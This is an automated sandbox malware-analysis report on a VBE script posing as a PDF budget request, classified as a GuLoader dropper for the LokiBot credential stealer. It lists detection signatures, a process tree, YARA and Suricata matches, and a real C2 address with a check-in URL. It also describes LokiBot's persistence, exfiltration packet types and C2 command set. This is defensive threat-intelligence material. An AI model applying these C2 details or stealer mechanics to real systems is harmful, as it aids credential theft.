Windows Analysis Report
PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe

Overview

General Information

Sample name: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe
renamed because original name is a hash value
Original sample name: PRORAČUNSKA ZAHTEVA 09-30-2024·pdf.vbe
Analysis ID: 1523160
MD5: ae06697b71084618bb9a2d051f6fad2f
SHA1: d3cc11739d47aebc183e425750d53ea0d412c8e0
SHA256: dc6607f4aa63d04407994442f3f085ccd29a2feadac2a791b90cdbcfee2f5fac
Tags: Loki, vbe, user-abuse_ch

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6600 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6412 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5588 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6196 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1520 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6972 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7096 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6500 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7064 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7056 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 2820 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1292 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1784 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • dxdiag.exe (PID: 2072 cmdline: "C:\Windows\syswow64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Loki Password Stealer (PWS), LokiBot
Description:

"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.

There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:

FILE EXTENSION  FILE DESCRIPTION
.exe            A copy of the malware that will execute every time the user account is logged into
.lck            A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts
.hdb            A database of hashes for data that has already been exfiltrated to the C2 server
.kdb            A database of keylogger data that has yet to be sent to the C2 server

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data.

The second packet transmitted by Loki-Bot contains decrypted Windows credentials.

The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version.

The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

BYTE  PAYLOAD TYPE
0x26  Stolen Cryptocurrency Wallet
0x27  Stolen Application Data
0x28  Get C2 Commands from C2 Server
0x29  Stolen File
0x2A  POS (Point of Sale?)
0x2B  Keylogger Data
0x2C  Screenshot

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

BYTE  INSTRUCTION DESCRIPTION
0x00  Download EXE & Execute
0x01  Download DLL & Load #1
0x02  Download DLL & Load #2
0x08  Delete HDB File
0x09  Start Keylogger
0x0A  Mine & Steal Data
0x0E  Exit Loki-Bot
0x0F  Upgrade Loki-Bot
0x10  Change C2 Polling Frequency
0x11  Delete Executables & Exit

Suricata Signatures

RULE SID  RULE NAME
2024311   ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected
2024312   ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1
2024313   ET TROJAN Loki Bot Request for C2 Commands Detected M1
2024314   ET TROJAN Loki Bot File Exfiltration Detected
2024315   ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1
2024316   ET TROJAN Loki Bot Screenshot Exfiltration Detected
2024317   ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2
2024318   ET TROJAN Loki Bot Request for C2 Commands Detected M2
2024319   ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2

Attribution:
  • SWEED
  • The Gorgon Group
  • Cobalt
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
No configs have been found
Source: dump.pcap
Rule: JoeSecurity_Lokibot_1
Description: Yara detected Lokibot
Author: Joe Security

Source: 00000004.00000002.3038628107.0000000008960000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_5
Description: Yara detected GuLoader
Author: Joe Security

Source: 00000004.00000002.3026899970.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_5
Description: Yara detected GuLoader
Author: Joe Security

Source: 00000004.00000002.3038911552.000000000B1AF000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security

Source: 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_5
Description: Yara detected GuLoader
Author: Joe Security

Source: Process Memory Space: powershell.exe PID: 3032
Rule: JoeSecurity_PowershellDownloadAndExecute
Description: Yara detected Powershell download and execute
Author: Joe Security

Source: amsi64_3032.amsi.csv
Rule: JoeSecurity_PowershellDownloadAndExecute
Description: Yara detected Powershell download and execute
Author: Joe Security

Source: amsi32_6412.amsi.csv
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0xc88e:$b2: ::FromBase64String(
  • 0xb905:$s1: -join
  • 0x50b1:$s4: +=
  • 0x5173:$s4: +=
  • 0x939a:$s4: +=
  • 0xb4b7:$s4: +=
  • 0xb7a1:$s4: +=
  • 0xb8e7:$s4: +=
  • 0x15d44:$s4: +=
  • 0x15dc4:$s4: +=
  • 0x15e8a:$s4: +=
  • 0x15f0a:$s4: +=
  • 0x160e0:$s4: +=
  • 0x16164:$s4: +=
  • 0xc131:$e4: Get-WmiObject
  • 0xc320:$e4: Get-Process
  • 0xc378:$e4: Start-Process
  • 0x1699f:$e4: Get-Process

System Summary

Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe", CommandLine|base64offset|contains: dP, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe", ProcessId: 6600, ProcessName: wscript.exe
Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe", CommandLine|base64offset|contains: dP, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe", ProcessId: 6600, ProcessName: wscript.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument omitted]
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:47:04.843116+020020243121A Network Trojan was detected192.168.2.549715137.184.191.21580TCP
                2024-10-01T07:47:07.607129+020020243121A Network Trojan was detected192.168.2.549716137.184.191.21580TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-01T07:47:02.251203+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49715 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:04.932136+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49716 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:07.728144+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49717 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:10.515717+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49718 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:13.564544+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49719 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:16.278702+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49721 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:19.097881+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49722 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:21.877834+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:24.642067+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49724 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:27.499223+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49725 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:30.316653+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49726 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:33.034241+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49727 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:35.829673+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49728 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:38.621072+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49729 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:41.697900+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49730 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:44.372628+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49731 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:47.079801+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49732 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:49.795411+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49733 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:52.566806+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49734 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:55.539715+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49735 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:58.249624+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49736 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:01.034428+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49737 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:03.781971+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49738 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:06.581937+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49739 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:09.408894+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49740 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:12.173913+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49741 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:14.938921+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49742 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:17.676415+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49743 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:20.422456+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49744 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:23.217240+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49745 | 137.184.191.215 | 80 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-01T07:47:10.358161+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49717 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:13.404925+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49718 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:16.115599+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49719 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:18.943117+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49721 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:21.708727+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49722 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:24.486909+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:27.345096+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49724 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:30.154608+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49725 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:32.878745+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49726 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:35.676257+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49727 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:38.454235+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49728 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:41.422964+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49729 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:44.201081+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49730 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:46.917412+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49731 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:49.642741+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49732 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:52.405586+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49733 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:55.095844+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49734 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:58.090306+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49735 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:00.871063+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49736 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:03.631363+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49737 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:06.420098+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49738 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:09.193755+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49739 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:12.018888+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49740 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:14.774319+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49741 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:17.521559+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49742 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:20.266760+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49743 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:23.061415+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49744 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:25.861936+0200 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49745 | 137.184.191.215 | 80 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-01T07:47:02.251203+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:04.932136+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:07.728144+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49717 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:10.515717+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49718 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:13.564544+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49719 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:16.278702+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49721 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:19.097881+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49722 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:21.877834+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49723 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:24.642067+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49724 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:27.499223+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49725 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:30.316653+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49726 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:33.034241+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49727 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:35.829673+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49728 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:38.621072+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49729 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:41.697900+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49730 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:44.372628+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49731 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:47.079801+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49732 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:49.795411+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49733 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:52.566806+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49734 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:55.539715+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49735 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:47:58.249624+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49736 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:01.034428+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49737 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:03.781971+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:06.581937+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49739 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:09.408894+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:12.173913+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49741 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:14.938921+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49742 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:17.676415+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49743 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:20.422456+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49744 | 137.184.191.215 | 80 | TCP
                2024-10-01T07:48:23.217240+0200 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.5 | 49745 | 137.184.191.215 | 80 | TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-01T07:46:57.524026+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49713 | 142.250.184.238 | 443 | TCP


                AV Detection

                Source: http://137.184.191.215/index.php/check.php?id=1, Virustotal: Detection: 14%
                Source: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe, ReversingLabs: Detection: 15%
                Source: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe, Virustotal: Detection: 12%
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: unknown, HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D65000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dxdiag.pdbGCTL source: 31437F.exe.18.dr
                Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D65000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dxdiag.pdb source: 31437F.exe.18.dr
                Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D11000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: on.pdb source: powershell.exe, 00000004.00000002.3032733282.0000000007606000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network traffic, Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49725 -> 137.184.191.215:80
